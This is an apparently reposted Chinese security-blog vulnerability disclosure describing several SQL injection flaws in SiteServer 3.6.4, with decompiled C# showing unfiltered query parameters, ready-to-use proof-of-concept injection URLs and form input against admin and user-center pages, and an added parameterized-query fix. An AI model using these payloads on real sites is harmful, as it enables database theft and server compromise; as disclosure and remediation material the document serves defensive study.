SiteServer latest version 3.6.4 SQL injection

暗月博客, 21 November 2019, 19:14:14

1. http://WWW.MOONSEC.COM/siteserver/service/background_taskLog.aspx?Keyword=test%' and @@version=1 and 2='1&DateFrom=&DateTo=&IsSuccess=All

The injection point is in Keyword, which has no filtering at all. Every kind of SQL injection is possible: OS commands can be executed and the database dumped.

2. The second injection is in siteserver/platform/background_log.aspx

Decompile BaiRong.BackgroundPages.dll with .NET Reflector.

The code is as follows:

    this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;
    flag = base.Request.QueryString["UserName"] != null;
    if (!flag)
    {
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend();
    }
    else
    {
        // all four query-string values go straight into the SQL builder
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(
            base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"],
            base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);
    }

None of the parameters is effectively filtered.
Proof of vulnerability:
http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101'%20and%20@@version=1%20and%201='test&DateTo=test

3. The third injection is in usercenter/platform/user.aspx
Decompile UserCenter.Pages.dll with .NET Reflector.
The code is as follows:

    if (!string.IsNullOrEmpty(base.Request.QueryString["Lock"]))
    {
        str = base.Request.QueryString["UserNameCollection"];
        userNameArrayList = TranslateUtils.StringCollectionToArrayList(str);
        UserDataProvider.UserDAO.Lock(userNameArrayList, true);
        LogUtils.AddLog("用户:" + UserDataProvider.UserDAO.CurrentUserName, "锁定用户", string.Format("用户:{0}", str));
    }

As long as Lock is non-empty, UserNameCollection is passed into the UserDataProvider.UserDAO.Lock function:

    public void Lock(ArrayList userNameArrayList, bool isLockOut)
    {
        // the quoted user names are concatenated directly into the IN (...) list
        string commandText = string.Format(
            "UPDATE bairong_Users SET IsLockedOut = '{0}' WHERE [UserName] IN ({1})",
            isLockOut.ToString(),
            TranslateUtils.ObjectCollectionToSqlInStringWithQuote(userNameArrayList));
        base.ExecuteNonQuery(commandText);
        UserManager.Clear();
    }

UserNameCollection is not effectively filtered:

http://www.target.com/usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test')%20and%20@@version=2;%20--

3. The seventh injection is in /UserCenter/cms/contents.aspx
Decompile UserCenter.Pages.dll with .NET Reflector.
The code is as follows:

    int totalCount;
    bool flag;
    string keyword = this.Keyword.Text.Trim();
    if ((((uint) totalCount) - ((uint) flag)) <= uint.MaxValue)   // decompiler artifact, always true
    {
        string start = this.start.Value;
        if (0 != 0)                                                // decompiler artifact, never taken
        {
            return;
        }
        string end = this.end.Value;
        if ((((uint) flag) - ((uint) flag)) <= uint.MaxValue)      // decompiler artifact, always true
        {
            base.SetPublishmentSystemID(TranslateUtils.ToInt(this.ddlPublishmentSystemID.SelectedValue));
            this.spContents.ControlToPaginate = this.dlContents;
            this.dlContents.ItemDataBound += new RepeaterItemEventHandler(this.x140df91522580d1f);
            this.spContents.ItemsPerPage = 30;
            this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;
            this.spContents.SelectCommand = DataProvider.ContentDAO.GetSelectCommendOfTouGao(
                base.PublishmentSystemInfo.AuxiliaryTableForContent, base.PublishmentSystemID,
                start, end, keyword, base.UserName, this.touGaoType);
        }
        this.spContents.SortField = "ID";

Note the keyword variable. Inside GetSelectCommendOfTouGao:

    public string GetSelectCommendOfTouGao(string tableName, int publishmentSystemID, string start, string end, string keyword, string userName, ETouGaoType touGaoType)
    {
        ....
        // keyword is formatted straight into the LIKE pattern
        builder.AppendFormat("AND (Title LIKE '%{0}%' OR Content LIKE '%{0}%')", keyword);
An obvious injection.
Proof of vulnerability:
Because this one is a POST and the server checks the ViewState, you need to register a member account, log in and then visit

http://www.target.com/UserCenter/cms/contents.aspx?PublishmentSystemID=1

and enter the following in the keyword field:
' and @@version=1 and 1='
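The Lock and keyword-filter queries above, rewritten with SqlParameter as an added example (this is not SiteServer's own code). Table and column names are taken from the decompiled code on this page; the class and method names, the 256-character parameter size and the conn argument are assumptions for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class SafeUserDao
{
    // Replacement for UserDAO.Lock: one SqlParameter per user name, so a value like
    // test') and @@version=2; -- is compared as a literal string, not parsed as SQL.
    public static SqlCommand BuildLockCommand(SqlConnection conn,
                                              IList<string> userNames, bool isLockOut)
    {
        if (userNames == null || userNames.Count == 0)
            throw new ArgumentException("at least one user name is required");
        SqlCommand cmd = conn.CreateCommand();
        var placeholders = new List<string>();
        for (int i = 0; i < userNames.Count; i++)
        {
            string name = "@u" + i;                               // @u0, @u1, ...
            placeholders.Add(name);
            cmd.Parameters.Add(name, SqlDbType.NVarChar, 256).Value = userNames[i];
        }
        cmd.Parameters.Add("@locked", SqlDbType.Bit).Value = isLockOut;
        // Only the placeholder names are concatenated into the IN (...) list.
        cmd.CommandText = "UPDATE bairong_Users SET IsLockedOut = @locked "
                        + "WHERE [UserName] IN (" + string.Join(", ", placeholders) + ")";
        return cmd;
    }

    // SQL Server LIKE treats %, _ and [ as wildcards; wrapping each in [] makes it
    // literal, so a keyword of 50% matches the text "50%" rather than "50<anything>".
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Replacement for the keyword filter in GetSelectCommendOfTouGao. tableName is
    // still interpolated, so the caller must pick it from a fixed whitelist (assumed).
    public static SqlCommand BuildKeywordCommand(SqlConnection conn,
                                                 string tableName, string keyword)
    {
        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandText = "SELECT * FROM [" + tableName.Replace("]", "]]") + "] WHERE "
                        + "(Title LIKE '%' + @kw + '%' OR Content LIKE '%' + @kw + '%')";
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 256).Value = EscapeLike(keyword);
        return cmd;
    }
}
```

The same pattern applies to the UserName, Keyword, DateFrom and DateTo arguments of LogDAO.GetSelectCommend: each optional filter becomes a parameter, and only fixed SQL text is ever concatenated.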

4. http://www.target.com/siteserver/bbs/background_thread.aspx?UserName=test&Title='%20and%201=@@version%20and%201='&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_post.aspx?UserName=&Title='%20and%20%201=@@version%20and%201='1&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_user.aspx?UserGroup=7&PageNum=0&Keyword='%20and%201=@@version%20and%201='&CreationDate=0&LastActivityDate=0

Source: http://0day5.com/archives/1011

Please keep this link when reposting (CN-SEC中文网; thanks to the original author for their work): http://cn-sec.com/archives/71637.html